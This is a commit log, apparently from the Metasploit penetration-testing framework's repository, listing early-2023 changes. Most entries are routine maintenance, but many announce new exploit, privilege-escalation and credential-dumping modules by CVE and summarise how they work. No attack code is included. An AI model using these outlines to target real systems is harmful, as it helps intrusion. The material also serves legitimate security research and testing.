Compare commits


638 Commits

Author SHA1 Message Date
Grant Willcox e7da4c4612 Land #17594, Add larger DLL templates 2023-02-15 19:35:37 -06:00
Metasploit 5a2ab6edd4 automatic module_metadata_base.json update 2023-02-15 15:32:23 -06:00
Grant Willcox a8d2073eee Land #17646, Link Hadoop YARN exploit to documentation 2023-02-15 15:09:05 -06:00
Arnout Engelen 5d8b1dc4a6 Link Hadoop YARN exploit to documentation
This exploit scans for misconfigured installations, link to the documentation
that describes how to properly secure it.
2023-02-15 21:17:26 +01:00
Grant Willcox b89602bb7b Land #17645, Fix bootup git warnings on arch 2023-02-15 11:49:57 -06:00
Spencer McIntyre 301d25ddfa Raise more explicit errors for invalid arguments 2023-02-15 09:07:01 -05:00
adfoster-r7 a98368cfc5 Fix bootup git warnings on arch 2023-02-15 11:18:02 +00:00
Spencer McIntyre 5725dd2ded Fix an off by one size error 2023-02-14 18:01:14 -05:00
Metasploit 165b0f8d61 automatic module_metadata_base.json update 2023-02-14 16:23:51 -06:00
Spencer McIntyre ac9d60ce9e Land #17281, Added module for CVE-2022-2992
Added module for CVE-2022-2992 - Gitlab Remote Command Execution via Github import
2023-02-14 16:57:29 -05:00
Spencer McIntyre 5d254cc36b Land heyder#2, Refactor namespaces 2023-02-14 16:44:29 -05:00
space-r7 78ae5f49ce add gitlab prefix back to methods 2023-02-14 15:26:01 -06:00
space-r7 304b90ecc8 split mixins between forms and v4 api used 2023-02-14 12:37:43 -06:00
Metasploit 0e86cfa6c7 automatic module_metadata_base.json update 2023-02-13 18:13:40 -06:00
Grant Willcox d012145726 Land #17599, Cisco RV LAN Exploit - CVE-2022-20705 and CVE-2022-20707 2023-02-13 17:50:06 -06:00
Stephen Wildow 96fecb6048 Modified BadChars and FailWith codes 2023-02-13 17:49:09 -05:00
Grant Willcox 45e453d687 Fix up remaining review comments 2023-02-13 15:07:25 -06:00
space-r7 9605b4bb91 Merge branch 'heyder-pr-1' into heyder-cve-2022-2992 2023-02-13 14:59:45 -06:00
Spencer McIntyre c3fa924cfa Remove the NGROK_URL option 2023-02-13 14:31:44 -05:00
Spencer McIntyre 210b7a3254 Use #get_json_document instead of JSON.parse
Also fix typos
2023-02-13 14:00:13 -05:00
Stephen Wildow 79b1801a4f Rewrote check method to only abuse authentication bypass. Added additional status checks. 2023-02-11 17:43:33 -05:00
Stephen Wildow 036ed7f467 Removed /etc/password. Modified check code and fail_with. Added proper checking for non-vulnerable versions of firmware. 2023-02-09 21:55:40 -05:00
Metasploit 86fc617259 automatic module_metadata_base.json update 2023-02-09 17:53:04 -06:00
Grant Willcox 0cf7dd850f Land #17626, Fix Frycos author name in fortra_goanywhere_rce_cve_2023_0669.rb 2023-02-09 17:38:34 -06:00
Frycos e963582e18 Update fortra_goanywhere_rce_cve_2023_0669.rb
Name typo
2023-02-09 23:06:59 +01:00
Grant Willcox f2a86327d0 Minor fixes from review 2023-02-09 15:34:25 -06:00
Metasploit 6343fc8f7c automatic module_metadata_base.json update 2023-02-09 14:27:19 -06:00
Spencer McIntyre fd6cd82f30 Upgrade DLL template size automatically 2023-02-09 15:09:50 -05:00
Spencer McIntyre 025ba6775d Add a README file with some basic information 2023-02-09 15:09:50 -05:00
Spencer McIntyre 126e3a9c9a Add larger 256KiB DLL templates 2023-02-09 15:09:50 -05:00
Spencer McIntyre 2608852d8c Consolidate gdiplus build code
This references the main dll/template.c code as the mixed-mode variant
already does. This will make future changes easier as we won't need to
copy them from the main to this one.

See https://github.com/rapid7/metasploit-framework/pull/8509 for the
origin of these files.
2023-02-09 15:09:50 -05:00
Grant Willcox aa9b3df6b3 Land #17625, Add credit for CVE-2023-0669; fix path in docs 2023-02-09 14:02:52 -06:00
Metasploit e420dc123d Bump version of framework to 6.3.3 2023-02-09 12:10:37 -06:00
Spencer McIntyre c7279e9a0a Add credit for CVE-2023-0669; fix path in docs 2023-02-09 13:02:40 -05:00
Metasploit 73567cfbf6 automatic module_metadata_base.json update 2023-02-09 11:57:08 -06:00
Grant Willcox 43b4ee268c Land #17592, Fix bypassuac_injection_winsxs for x64 2023-02-09 11:41:51 -06:00
Spencer McIntyre e6f4e96544 Close hFindFile 2023-02-09 11:43:20 -05:00
adfoster-r7 139ad4a4be Land #17623, Move fortra_goanywhere_rce_cve_2023_0669 module documentation to documentation directory 2023-02-09 13:21:10 +00:00
bcoles de8a6e1445 Move fortra_goanywhere_rce_cve_2023_0669 module documentation to documentation directory 2023-02-09 23:12:45 +11:00
Metasploit 2f20c9836f automatic module_metadata_base.json update 2023-02-09 04:25:48 -06:00
cgranleese-r7 508f5c7e52 Land #17619, Run rubocop on exploit modules 2023-02-09 10:11:53 +00:00
Stephen Wildow 4b05ba6189 Update description and vulnerability listings. Cleaned up references. More randomization. Removed first unnecessary request in exploit portion of code. Added rescue section around json grabbing. 2023-02-08 21:26:18 -05:00
Stephen Wildow 427c181e9a Utilized msftidy_docs.rb to clean up missing sections, excessively long lines, spaces at EOL, and space end of file. Removed credit section. Expanded on installation procedure. Modified steps procedure to include Verify options and removed failure status. Removed Targets section. Scenarios have device, target, and architecture. 2023-02-08 19:18:14 -05:00
Metasploit a9bd7e9f46 automatic module_metadata_base.json update 2023-02-08 13:31:52 -06:00
bwatters 01a78f972c Land #17567, ManageEngine Endpoint Central RCE (CVE-2022-47966)
Merge branch 'land-17567' into upstream-master
2023-02-08 13:06:53 -06:00
Metasploit 79a5481d9c automatic module_metadata_base.json update 2023-02-08 12:10:30 -06:00
Spencer McIntyre c997952d83 Land #17607, Fortra RCE CVE-2023-0669
Fortra deserialization RCE CVE-2023-0669 (ETR)
2023-02-08 12:56:09 -05:00
Metasploit 810ef42bf0 automatic module_metadata_base.json update 2023-02-08 11:55:11 -06:00
Ron Bowes 0c6ebed3ac Merge pull request #3 from smcintyre-r7/pr/collab/17607
Pr/collab/17607
2023-02-08 09:41:35 -08:00
cgranleese-r7 a878403a3e Land #17618, Run rubocop on auxiliary admin http modules 2023-02-08 17:40:26 +00:00
Metasploit 0de766498c automatic module_metadata_base.json update 2023-02-08 10:49:50 -06:00
cgranleese-r7 c3e9e2751a Land #17617, Update linting on post modules 2023-02-08 16:35:20 +00:00
adfoster-r7 656ded4b86 Add module notes 2023-02-08 15:46:07 +00:00
Spencer McIntyre 2b008af097 Move the module to reflect it targets Windows too 2023-02-08 10:24:27 -05:00
adfoster-r7 25ee41df68 Run rubocop on exploit modules 2023-02-08 15:20:32 +00:00
adfoster-r7 9469c8394a Update rubocop rules for modules 2023-02-08 15:18:25 +00:00
Spencer McIntyre 75ceb7b670 Refactor option handling.
Use CamelCase names for advanced options and add validation.
2023-02-08 10:17:16 -05:00
Spencer McIntyre fef7c85518 Add Windows target compatibility 2023-02-08 09:47:37 -05:00
adfoster-r7 6e9b33dc88 Run rubocop on auxiliary admin http modules 2023-02-08 14:30:08 +00:00
Metasploit 716ba68b25 automatic module_metadata_base.json update 2023-02-08 08:24:26 -06:00
adfoster-r7 b56213b168 Update linting on post modules 2023-02-08 14:12:43 +00:00
dwelch-r7 11c886b30f Land #17616, Run rubocop on post modules 2023-02-08 14:09:16 +00:00
adfoster-r7 a81a71c5df Run rubocop on post modules 2023-02-08 13:47:34 +00:00
adfoster-r7 488cfc84ef Disable noisy or unsafe Rubocop rules 2023-02-08 13:42:49 +00:00
Metasploit f8bb85ffe3 automatic module_metadata_base.json update 2023-02-08 07:06:26 -06:00
dwelch-r7 7909fe32c2 Land #17612, Add exception handling for finalizer methods 2023-02-08 12:33:52 +00:00
cgranleese-r7 10144a9f13 Land #17615, Add missing module notes for stability reliability and side effects 2023-02-08 12:28:47 +00:00
adfoster-r7 433bafdccf Add missing module notes for stability reliability and side effects 2023-02-08 11:45:17 +00:00
adfoster-r7 d261aa6a2b Land #17603, Add ul_type 12 (UPN and DNS info) to pac bindata 2023-02-08 11:22:20 +00:00
adfoster-r7 4311c34a0b Land #17614, Weekly dependency updates for Gemfile.lock 2023-02-08 11:13:15 +00:00
Stephen Wildow 35749a000a Added docs. Performed code linting with rubocop. 2023-02-07 20:27:07 -05:00
Grant Willcox affe47957b Bump up Gems 2023-02-07 17:21:16 -06:00
Metasploit 1168658f0e automatic module_metadata_base.json update 2023-02-07 17:21:03 -06:00
dwelch-r7 782e4c0295 Add ul_type 12 (UPN and DNS info) to pac bindata 2023-02-07 23:14:00 +00:00
bwatters 8ee67085c8 Land #17556, ManageEngine ADSelfService Plus RCE (CVE-2022-47966)
Merge branch 'land-17556' into upstream-master
2023-02-07 16:57:22 -06:00
Metasploit a036c2fae0 automatic module_metadata_base.json update 2023-02-07 15:54:12 -06:00
Grant Willcox c2e8f3fa69 Land #17494, Add NagiosXI authenticated RCE (CVE-2021-25296, CVE-2021-25297,CVE-2021-25298) exploit module 2023-02-07 15:38:36 -06:00
adfoster-r7 f145a214ca Add exception handling for finalizer methods 2023-02-07 20:28:15 +00:00
Matthew Dunn 52fa2e5be6 Add example for version 5.5.6 with CVE-2021-25297 2023-02-07 14:18:53 -06:00
Grant Willcox 489ab24876 Add in additional case documentation for the various targets and CVEs and fix a bug in the code 2023-02-07 14:18:45 -06:00
Matthew Dunn 8ba7a28caf Add quotes to set-time command in docs 2023-02-07 14:18:45 -06:00
Grant Willcox 7c30889784 Refactor code to handle unsigned licenses in one central function 2023-02-07 14:18:39 -06:00
Grant Willcox b14bcd40a2 Fix incorrect match logic grabbing the wrong entry from results for NSP 2023-02-07 14:18:38 -06:00
Grant Willcox 425da60b15 Add in missing case 5 check 2023-02-07 14:18:38 -06:00
Matthew Dunn 90e07ef5ed Switch to match over scan and add troubleshooting steps 2023-02-07 14:18:37 -06:00
Matthew Dunn 8cddf56238 Verify auth_cookies before use 2023-02-07 14:18:37 -06:00
Matthew Dunn a276659681 Use more encompassing single regex 2023-02-07 14:18:36 -06:00
Matthew Dunn 7554b5e4fd Add failure condition for nsp's that fail to match the regex 2023-02-07 14:18:36 -06:00
Matthew Dunn 1cb06b11ac Adjust exploit and docs to support versions 5.5.6-5.7.5 2023-02-07 14:18:09 -06:00
Matthew Dunn 87176f9d7f Address Review Comments and add CVE-2021-25297 coverage 2023-02-07 14:18:06 -06:00
Matthew Dunn c5914d8c99 Insert randomized strings to fix exploit with plugin_output_len 2023-02-07 14:18:05 -06:00
Matthew Dunn 990db5372f Remove extra payload details, add config check 2023-02-07 14:18:05 -06:00
Matthew Dunn b042e71b2a Make Module work for both target url parameters 2023-02-07 14:18:04 -06:00
Matthew Dunn b606d1ff6b Add Documentation for Module
Fix CVE format

Add Documentation
2023-02-07 14:18:04 -06:00
Matthew Dunn 5846d95b25 Create nagios_xi_configwizards_authenticated_rce.rb
Add initial module
2023-02-07 14:18:03 -06:00
Ron Bowes 676bb2af02 Fix a couple requests from the PR 2023-02-07 09:05:44 -08:00
Ron Bowes 588bddc950 Fix a couple requests from the PR 2023-02-07 09:05:16 -08:00
Metasploit 4143e6ea92 automatic module_metadata_base.json update 2023-02-06 17:52:49 -06:00
bwatters 53c67653f5 Land #17527, ManageEngine ServiceDesk Plus RCE (CVE-2022-47966)
Merge branch 'land-17527' into upstream-master
2023-02-06 17:37:31 -06:00
Ron Bowes f7fb611bcc Add documentation 2023-02-06 14:35:42 -08:00
bwatters 8b116a7dcd Minor punctuation change 2023-02-06 16:32:39 -06:00
Ron Bowes 89485703dc Make rubocop happy 2023-02-06 14:23:55 -08:00
Ron Bowes 9b90343480 Check in the module 2023-02-06 14:21:42 -08:00
Metasploit b9bcf45a7d automatic module_metadata_base.json update 2023-02-06 08:21:33 -06:00
adfoster-r7 4a2dc0d6b0 Land #17598, modules/exploits/unix/local Add Notes and resolve RuboCop violations 2023-02-06 13:59:19 +00:00
adfoster-r7 215cfa27b0 Land #17483, add tomcat 8 priv esc on ubuntu (cve-2016-1240) 2023-02-06 13:53:25 +00:00
Spencer McIntyre 6e6d8473b6 Land #17595, Documentation update
Documentation update to reflect Address instead of Host in ReverseListener setup
2023-02-06 08:45:39 -05:00
h00die-gr3y d763faf245 sync documentation 2023-02-06 06:56:59 +00:00
Stephen Wildow 475813eb33 Properly labeling ZDI vulnerability 2023-02-05 21:48:48 -05:00
Stephen Wildow 59332da8ce Randomized hard coded strings, modified cmd string, and updated references 2023-02-05 21:42:57 -05:00
Stephen Wildow ac9caa8894 Removed unnecessary CVE listing 2023-02-05 14:32:04 -05:00
Stephen Wildow 7cff3cc2b0 Updated to include vulnerable versions of software 2023-02-05 13:20:52 -05:00
Stephen Wildow 4b3125d14b Add module to exploit Cisco RV34x Small Business Routers 2023-02-05 10:15:16 -05:00
Metasploit 42e1bed3f5 automatic module_metadata_base.json update 2023-02-05 08:23:02 -06:00
adfoster-r7 af29786f1b Land #17597, qubes_mirage_firewall_dos: Fix notes for SideEffects and Reliability 2023-02-05 14:08:57 +00:00
h00die a5a7d5dd10 correct cleanup and stabilization 2023-02-05 08:15:38 -05:00
bcoles adf5091c7a modules/exploits/unix/local: Add Notes and resolve RuboCop violations 2023-02-05 15:45:30 +11:00
bcoles 19b526d584 qubes_mirage_firewall_dos: Fix notes for SideEffects and Reliability 2023-02-05 12:04:59 +11:00
h00die 561b42f105 use exploit retry function 2023-02-04 18:17:42 -05:00
h00die 6aa6f5176b touch up verbiage and stuff 2023-02-04 18:17:42 -05:00
h00die aff14e8e46 tocat to tomcat 2023-02-04 18:17:42 -05:00
h00die e30cae2e40 uncomment needed code 2023-02-04 18:17:42 -05:00
h00die 34b1e66f90 tomcat 8 priv esc on ubuntu prebuilt so file 2023-02-04 18:17:41 -05:00
h00die 2b09af78e1 tomcat 8 priv esc on ubuntu 2023-02-04 18:17:41 -05:00
Matt Konda c3393f30c3 Update to reflect Address instead of Host in
Update the name of the ReverseListenerBindAddress (instead of ReverseListenerBindHost) because that seems to work.

```
msf6 exploit(multi/http/tomcat_jsp_upload_bypass) > set ReverseListenerBindHost 172.17.0.2
[-] Unknown datastore option: ReverseListenerBindHost. Did you mean ReverseListenerBindPort?
msf6 exploit(multi/http/tomcat_jsp_upload_bypass) > set ReverseListenerBindAddress 172.17.0.2
ReverseListenerBindAddress => 172.17.0.2
```
2023-02-03 23:27:32 -06:00
Grant Willcox ad82437067 Land #17591, Fix metasm_shell by requiring readline 2023-02-03 15:14:32 -06:00
Spencer McIntyre dc179f6279 Fix stack trace on exit via Ctrl+D (EOF) 2023-02-03 14:38:07 -05:00
Spencer McIntyre 51fd9ee703 Require readline 2023-02-03 14:38:02 -05:00
Spencer McIntyre f2e5e77e27 Fix bypassuac_injection_winsxs for x64
Tested on Windows 8.1, prior to these changes the bad railgun definition
would cause the session to crash.
2023-02-03 13:02:53 -05:00
adfoster-r7 fd43c43a30 Land #17452, Deprecate import-dev-keys script 2023-02-03 17:49:57 +00:00
Grant Willcox d576e77b70 Deprecate import-dev-keys.sh 2023-02-03 10:12:12 -06:00
cgranleese-r7 6d62362b82 Land #17587, Update wiki to use latest ruby conventions 2023-02-03 14:30:16 +00:00
Metasploit 3b80e223b1 automatic module_metadata_base.json update 2023-02-03 07:57:50 -06:00
cgranleese-r7 80dbbca020 Land #17371, Lenovo Diagnostics Driver Privilege Escalation (CVE-2022-3699) 2023-02-03 13:43:04 +00:00
adfoster-r7 c777b33fcb Update wiki to use latest ruby conventions 2023-02-03 13:35:03 +00:00
adfoster-r7 c3c3987867 Land #17398, Update cmdstager docs 2023-02-03 13:08:01 +00:00
Metasploit 87323134a5 automatic module_metadata_base.json update 2023-02-02 14:28:38 -06:00
Jack Heysel 6ab7e177f4 Land #17392, add F5 Big-IP priv esc module
Add a privilege escalation module for F5 that uses
the unsecured MCP socket to create a new root account
2023-02-02 15:10:33 -05:00
Metasploit feee510999 automatic module_metadata_base.json update 2023-02-02 13:03:49 -06:00
Jack Heysel 99e31c561a Land #17585, mac dirty cow add session types
Sets missing session types during module initialization
2023-02-02 13:36:43 -05:00
Jack Heysel f4ad778bd0 Added missing session types 2023-02-02 13:29:43 -05:00
Metasploit 5d6e989e64 Bump version of framework to 6.3.2 2023-02-02 12:11:52 -06:00
Metasploit 83f9964e99 automatic module_metadata_base.json update 2023-02-02 12:03:09 -06:00
adfoster-r7 cfb5a55880 Land #16946, Add row indicator to show targets command 2023-02-02 17:26:53 +00:00
Jack Heysel af2ef53462 Land #17415, macOS dirty cow priv esc 2023-02-02 12:15:19 -05:00
adfoster-r7 b408837b7f Land #17575, Load TGS tickets with a different sname 2023-02-02 17:02:48 +00:00
cgranleese-r7 d1e68e634a Add row indicator to show targets command 2023-02-02 16:12:19 +00:00
Jack Heysel 1f224fd2d3 Rapid7 compiled binary 2023-02-02 11:11:06 -05:00
Jack Heysel 88caeddc8c Fixed license 2023-02-02 11:10:06 -05:00
Jack Heysel 4de5e44bda Documentation 2023-02-02 10:38:26 -05:00
Spencer McIntyre 3eaed76025 Land #17561, Fix functions in def_iphlpapi.rb
Fix input and output buffers for some mislabeled functions in def_iphlpapi.rb
2023-02-02 09:10:28 -05:00
Metasploit 2b2406f9af automatic module_metadata_base.json update 2023-02-02 05:05:42 -06:00
adfoster-r7 952a4fe37a Land #17581, modules: Check datastore ForceExploit before checking if session is root 2023-02-02 10:19:07 +00:00
adfoster-r7 56866ad09a Land #17580, update links to new docs website 2023-02-02 10:15:10 +00:00
bcoles 6f4a17230d exploits/osx/local/vmware_fusion_lpe: Add notes 2023-02-02 18:46:08 +11:00
bcoles a83d070396 exploits/freebsd/local/ip6_setpktopt_uaf_priv_esc: Add Reliability notes 2023-02-02 18:45:43 +11:00
bcoles ef87a63bde modules: Check datastore ForceExploit before checking if session is root 2023-02-02 18:17:02 +11:00
Grant Willcox 48a27ab555 Fix the remaining references to the old wiki site. 2023-02-01 21:25:06 -06:00
Metasploit e752e1dbca automatic module_metadata_base.json update 2023-02-01 18:12:49 -06:00
adfoster-r7 6870efc34a Land #17426, Update all references to old Wiki to point to new docs site 2023-02-01 23:49:20 +00:00
Metasploit f128640bf1 automatic module_metadata_base.json update 2023-02-01 16:59:01 -06:00
Jack Heysel c90a6f9068 Land #17406, veeam_credential_dump post module
Veeam Backup & Recovery and Veeam ONE Monitor credential
capture post module for versions 9.x and 11.x.
2023-02-01 17:29:05 -05:00
Metasploit 4418bcc673 automatic module_metadata_base.json update 2023-02-01 16:18:56 -06:00
Jack Heysel f4c5632b6d Cleaned up license file 2023-02-01 17:04:26 -05:00
Jack Heysel 076ffbcc65 Merge branch 'mac_dirty_cow' of github.com:timwr/metasploit-framework into mac_dirty_cow 2023-02-01 16:57:36 -05:00
Jack Heysel 3c7cbf62e6 Updated default payload 2023-02-01 16:56:28 -05:00
jheysel-r7 6037936869 Update LICENSE 2023-02-01 16:54:04 -05:00
jheysel-r7 595f34fc6f Merge branch 'master' into mac_dirty_cow 2023-02-01 16:51:09 -05:00
Grant Willcox e9fef56186 Land #17481, Update HTTP options module 2023-02-01 15:49:27 -06:00
Jack Heysel 057f046186 Updated license file 2023-02-01 16:46:45 -05:00
h00die 4ba04df138 update http options 2023-02-01 15:12:39 -06:00
Ron Bowes cf172d22c8 Get rid of #String.hash in favour of UnixCrypt 2023-02-01 11:02:04 -08:00
Grant Willcox b5a83ffd0f Add in PULONG alias to PDWORD and update definitions 2023-02-01 12:36:22 -06:00
Ron Bowes 1094221468 Merge branch 'rapid7:master' into f5-createuser-privesc 2023-02-01 10:20:43 -08:00
Jeffrey Martin 8d31b63f7a update Pro version docs for 4.22.0 release 2023-02-01 12:19:59 -06:00
Ron Bowes 34d93e862c Update modules/exploits/linux/local/f5_create_user.rb
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2023-02-01 10:16:03 -08:00
Ron Bowes e90b47fd17 Update modules/exploits/linux/local/f5_create_user.rb
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2023-02-01 10:15:00 -08:00
Ron Bowes d89c193db2 Update modules/exploits/linux/local/f5_create_user.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-02-01 10:14:38 -08:00
Ron Bowes 638a1c519d Update documentation/modules/exploit/linux/local/f5_create_user.md
Better demo exploit

Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-02-01 10:14:25 -08:00
Metasploit b922bb533b automatic module_metadata_base.json update 2023-02-01 11:15:51 -06:00
adfoster-r7 014bdddd1a Land #17564, Fixed AnyConnect IPC message format 2023-02-01 16:34:44 +00:00
adfoster-r7 a5990a5a7d Land #17578, modules/exploits/openbsd Add notes and use CheckCodes messages 2023-02-01 16:26:59 +00:00
Metasploit 5af2689a0e automatic module_metadata_base.json update 2023-02-01 10:16:55 -06:00
Jack Heysel a6f0a8abe3 Land #17301, module for cve-2022-1043, linux LPE
This module exploits a bug in io_uring leading to an additional put_cred
that can be exploited to hijack credentials of other processes.
2023-02-01 10:38:10 -05:00
Jack Heysel 690d22f759 Rapid7 compiled binary 2023-02-01 10:08:13 -05:00
Spencer McIntyre 994d41ac80 Update parts of the docs 2023-02-01 09:28:00 -05:00
adfoster-r7 5a1eb16018 Land #17574, Use the new NDR types in RubySMB v3.2.4 2023-02-01 12:02:47 +00:00
Metasploit 4a04a86675 automatic module_metadata_base.json update 2023-02-01 05:46:09 -06:00
bcoles 86a6611e98 modules/exploits/openbsd: Add notes and use CheckCodes messages 2023-02-01 22:26:44 +11:00
adfoster-r7 1ff1cd1779 Land #17577, modules/exploits/qnx Use AutoCheck, add Notes, resolve Rubocop violations 2023-02-01 11:20:49 +00:00
bcoles c9012ae222 modules/exploits/qnx: Use AutoCheck, add Notes, resolve Rubocop violations 2023-02-01 20:51:44 +11:00
h00die 2c72cc145a updates to module 2023-01-31 20:05:33 -05:00
Spencer McIntyre 84f798da32 Allow loading TGS tickets for other service names
Fixes #17571
2023-01-31 17:03:25 -05:00
h00die fa687d3614 argv instead of hardcoded payload path 2023-01-31 16:02:25 -05:00
h00die 5a374533af cve-2022-1043 2023-01-31 16:02:25 -05:00
h00die 8d58eb6279 cve-2022-1043 2023-01-31 16:02:25 -05:00
Metasploit 42542102e3 automatic module_metadata_base.json update 2023-01-31 13:59:14 -06:00
Jack Heysel 2306736383 Land #17300, the latest commit in PR 17300
I made a mistake and was not up to date with the latest commit
in the PR before I landed, this fixes that mistake.
2023-01-31 14:18:01 -05:00
Jack Heysel 022760d24a Land #17300, linux LPE cve-2022-22942 module
This PR adds a linux priv esc against VMWare virtual machines
with kernel 4.14-rc1 - 5.17-rc1 due to a VMWare driver bug.
2023-01-31 14:07:55 -05:00
Jack Heysel e99407fe26 Updated pre_compiled binary 2023-01-31 13:37:45 -05:00
Jeffrey Martin 9c7665a017 add GSoC 2023 to navigation 2023-01-31 11:00:26 -06:00
Grant Willcox b866bf59c8 Land #17444, Fix parsing of module options with special characters 2023-01-31 10:42:16 -06:00
Grant Willcox 8805ed2b5a Last minute typo fixes 2023-01-31 10:41:47 -06:00
Jeffrey Martin 77dd6bd77e add initial 2023 GSoC ideas doc 2023-01-31 10:18:12 -06:00
Spencer McIntyre 0d9a282237 Use the new NDR types in RubySMB v3.2.4 2023-01-31 10:08:27 -05:00
Metasploit daa96f9fb7 automatic module_metadata_base.json update 2023-01-31 08:53:19 -06:00
adfoster-r7 56728fc7c2 Land #17573, modules/exploits/linux/ssh Resolve Rubocop violations 2023-01-31 14:12:03 +00:00
adfoster-r7 bbf17c167c Land #17511, add exploit for CVE-2022-44877 command injection in CentOS Control Web Panel 2023-01-31 14:05:19 +00:00
adfoster-r7 5076518fe4 Land #17559, add support for Ruby 3.2 2023-01-31 13:45:51 +00:00
cgranleese-r7 fb196cb378 Testing Ruby 3.2 against CI 2023-01-31 13:19:06 +00:00
bcoles 11cf391da8 modules/exploits/linux/ssh: Resolve Rubocop violations 2023-01-31 23:59:22 +11:00
adfoster-r7 7bb0eca931 Land #17545, use strings in YAML files 2023-01-30 22:52:19 +00:00
Metasploit 42004c07bc automatic module_metadata_base.json update 2023-01-30 16:43:35 -06:00
adfoster-r7 433099e539 Land #17563, modules/exploits/multi/local: Resolve Rubocop and msftidy_docs violations 2023-01-30 22:16:41 +00:00
Grant Willcox bfc5c563a1 Land #17570, Add new queries and attributes for ldap_query 2023-01-30 16:14:26 -06:00
Spencer McIntyre 902eaa2562 Add new queries and attributes for ldap_query 2023-01-30 16:24:23 -05:00
dwelch-r7 e3a9e5a163 Land #17565, Add Metasploit prompt color highlighting to docs 2023-01-30 13:05:08 +00:00
adfoster-r7 f3a372719c Land #17568, Plugins: Resolve Rubocop violations 2023-01-30 11:35:31 +00:00
Christophe De La Fuente f676568d89 Fix CVE 2023-01-30 12:18:08 +01:00
Christophe De La Fuente a5ba1245c2 Fix CVE 2023-01-30 12:15:14 +01:00
bcoles db90604333 plugins/bescure: Replace 'initheaders' Hash key with Hash in Net::HTTP::Post.new calls 2023-01-30 22:11:21 +11:00
bcoles 4ff475f180 plugins: Resolve rubocop violations 2023-01-30 13:07:16 +11:00
bcoles 7cf37f5fb7 plugins: rubocop -A plugins 2023-01-30 13:05:34 +11:00
bcoles dd20bcac77 plugins: rubocop -a plugins 2023-01-30 12:25:46 +11:00
h00die-gr3y a2f4a27614 updated module and added documentation 2023-01-29 10:06:14 +00:00
h00die-gr3y bf10b29a84 first drop module 2023-01-29 07:47:22 +00:00
adfoster-r7 c68ab9b77f Add Metasploit prompt color highlighting to docs 2023-01-28 22:43:33 +00:00
Duarte Silva a7ae3c9389 Fixed AnyConnect IPC message format:
- Made an error in the original research where the TLV had a type
  and an index, when it only has a type and a modifier that makes
  it into a TV (Type and Value, no Length).
- A TV has its value where the Length would be on a TLV.
- Also added a note on the endianness being correct/working because
  endianness has no impact in the message being used to exploit the
  vulnerability.
2023-01-28 09:08:51 +00:00
bcoles e11aaa8027 modules/exploits/multi/local: Resolve Rubocop and msftidy_docs violations 2023-01-28 15:02:24 +11:00
Metasploit 1b20db8900 automatic module_metadata_base.json update 2023-01-27 14:39:53 -06:00
Grant Willcox be85aa253d Fix input and output buffers for some mislabeled functions 2023-01-27 14:09:45 -06:00
Jack Heysel c3e73b9b11 Land #17557, Fix the logon_time in the MS14-068 2023-01-27 15:08:49 -05:00
Christophe De La Fuente 85d5b041aa Add minimum build number check 2023-01-27 18:03:19 +01:00
Grant Willcox 1782ae1ff2 Fix up links within Wiki site to make them relative links where possible 2023-01-27 10:09:02 -06:00
Grant Willcox 6043d0ffba Update all links from Wiki site to new docs site. 2023-01-27 09:58:53 -06:00
Grant Willcox 6111852df8 Land #17504, add 'favorite -l' and 'favorites' as aliases for show favorites 2023-01-27 09:37:06 -06:00
adfoster-r7 c681358f88 Land #17558, Fixes analyze command crashing with a winrm session opened 2023-01-27 15:35:40 +00:00
Spencer McIntyre 647cf1d402 Return Time from #extract_logon_time 2023-01-27 10:05:02 -05:00
Metasploit 8d4d48e005 automatic module_metadata_base.json update 2023-01-27 08:14:45 -06:00
dwelch-r7 4c54fffaed Land #17560, Present unsupported ul_types in a clearer way to the user 2023-01-27 13:50:55 +00:00
adfoster-r7 020e221c42 Present unsupported ul_types in a clearer way to the user 2023-01-27 13:40:33 +00:00
cgranleese-r7 1d8c9d3690 Fixes analyze command crashing with a winrm session opened 2023-01-27 10:45:05 +00:00
Spencer McIntyre f4976a0f9f Fix the logon_time in the MS14-068 exploit 2023-01-26 16:16:55 -05:00
Christophe De La Fuente e01239cf7b Add exploit module and documentation 2023-01-26 21:53:14 +01:00
Metasploit d80a18a00c Bump version of framework to 6.3.1 2023-01-26 13:40:05 -06:00
Jeffrey Martin dc6c1e333b Land #17553, Framework 6.3.0 2023-01-26 13:30:27 -06:00
Jeffrey Martin bdb0cadc4f Land #17291, Add support for rails 7 2023-01-26 11:50:29 -06:00
adfoster-r7 672fb9ce9f Land #17460, add support for feature kerberos authentication 2023-01-26 17:47:27 +00:00
Christophe De La Fuente ed2dd2fc0c Add randomization in the XML when possible & fix BadChars issue 2023-01-26 18:42:09 +01:00
adfoster-r7 ab60df7cda Land #17519, improve SMTP delivery error handling 2023-01-26 17:02:02 +00:00
dwelch-r7 4254276c26 Land #17531, Change kerberos option name namespacing convention to :: 2023-01-26 16:29:11 +00:00
Spencer McIntyre 1b34e5923f Land #17551, Fix issue on nil kerberos username
Fix force encoding issue on nil kerberos username
2023-01-26 11:23:05 -05:00
adfoster-r7 2d30909a2f Change option name namespacing convention 2023-01-26 16:17:50 +00:00
adfoster-r7 d90398d217 Land #17549, Catch Encryption Errors In inspect_ticket 2023-01-26 16:15:21 +00:00
cgranleese-r7 fb79a5f9d2 Land #17547, Remove KRB5CCNAME env var on bootup 2023-01-26 16:11:03 +00:00
Grant Willcox 87b9152314 Continue fixing versions of Ruby in YAML files not being properly quoted like they should be. 2023-01-26 09:49:08 -06:00
Spencer McIntyre fc0324f28b Consistently print keys without \x 2023-01-26 10:49:05 -05:00
adfoster-r7 a2aef99bb2 Fix force encoding issue on nil kerberos username 2023-01-26 15:25:49 +00:00
adfoster-r7 9e218116c0 Land #17543, update docs build to support relative links that start with ./ 2023-01-26 15:23:45 +00:00
Jeffrey Martin b295429fc9 latest metasploit-credential gem 2023-01-26 09:22:56 -06:00
Christophe De La Fuente 2be22752be Add Linux specifics and documentation 2023-01-26 16:16:00 +01:00
Jeffrey Martin 7d221af4a0 Land #17546, deprecation warning for secrets dump 2023-01-26 08:28:22 -06:00
Spencer McIntyre 2da5d8ea43 Catch exceptions in inspect_ticket 2023-01-26 09:21:55 -05:00
adfoster-r7 992883b1a6 Remove KRB5CCNAME env on bootup 2023-01-26 12:09:55 +00:00
adfoster-r7 d5781ed021 Land #17532, Fix bad DN discovery code and fix bug with querying schema data 2023-01-26 10:43:13 +00:00
adfoster-r7 25ba3304ab Fix rails 7 deprecation warning for secrets dump module 2023-01-26 10:22:28 +00:00
